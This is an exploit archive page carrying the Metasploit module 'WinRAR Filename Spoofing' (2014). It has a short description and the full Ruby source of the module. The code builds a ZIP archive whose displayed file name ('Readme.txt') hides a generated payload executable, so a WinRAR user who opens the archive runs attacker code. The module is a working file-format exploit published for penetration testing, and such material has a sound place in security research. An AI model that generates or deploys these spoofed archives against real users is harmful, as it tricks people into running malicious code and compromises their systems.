WinRAR Filename Spoofing

WinRAR Filename Spoofing: Posted Apr 7, 2014; Authored by chr1x, juan vazquez | Site metasploit.com; This Metasploit module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in March 2014.; tags | exploit, arbitrary, local, spoof; advisories | OSVDB-62610; SHA-256 | 77adfa4fa0e23c97becb1de4580cf456d6594ca7beef63394258815f48627e38; Download | Favorite | View

WinRAR Filename Spoofing

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WinRAR Filename Spoofing',
      'Description'    => %q{
        This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists
        when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from
        the central directory, but the file names used to extract and open contents come from the
        Local File Header. This inconsistency allows to spoof file names when opening ZIP files
        with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in
        March 2014
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'chr1x', # Vulnerability discoverer according to OSVDB
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '62610' ],
          [ 'BID', '66383' ],
          [ 'URL', 'http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html'],
          [ 'URL', 'http://an7isec.blogspot.co.il/']
        ],
      'Platform'          => [ 'win' ],
      'Payload'           =>
        {
          'DisableNops' => true,
          'Space' => 4096
        },
      'Targets'        =>
        [
          [ 'Windows Universal', {} ]
        ],
      'DisclosureDate' => 'Sep 28 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('SPOOF', [ true, 'The spoofed file name to show', 'Readme.txt']),
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])
      ], self.class)

  end

  def exploit
    exe_filename = rand_text_alpha(rand(6) + 1)
    exe_filename << ".exe"

    zip = Rex::Zip::Archive.new
    zip.add_file(exe_filename, generate_payload_exe, nil, nil, datastore['SPOOF'])
    pack = zip.pack

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(pack)
  end

end

Top Authors In Last 30 Days

Red Hat 246 files
indoushka 169 files
Jay Turla 150 files
Ubuntu 73 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,120)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,166)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,794)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,837)
UNIX (9,454)
UnixWare (188)
Windows (6,768)
Other

WinRAR Filename Spoofing

WinRAR Filename Spoofing

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WinRAR Filename Spoofing

Share This

WinRAR Filename Spoofing

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems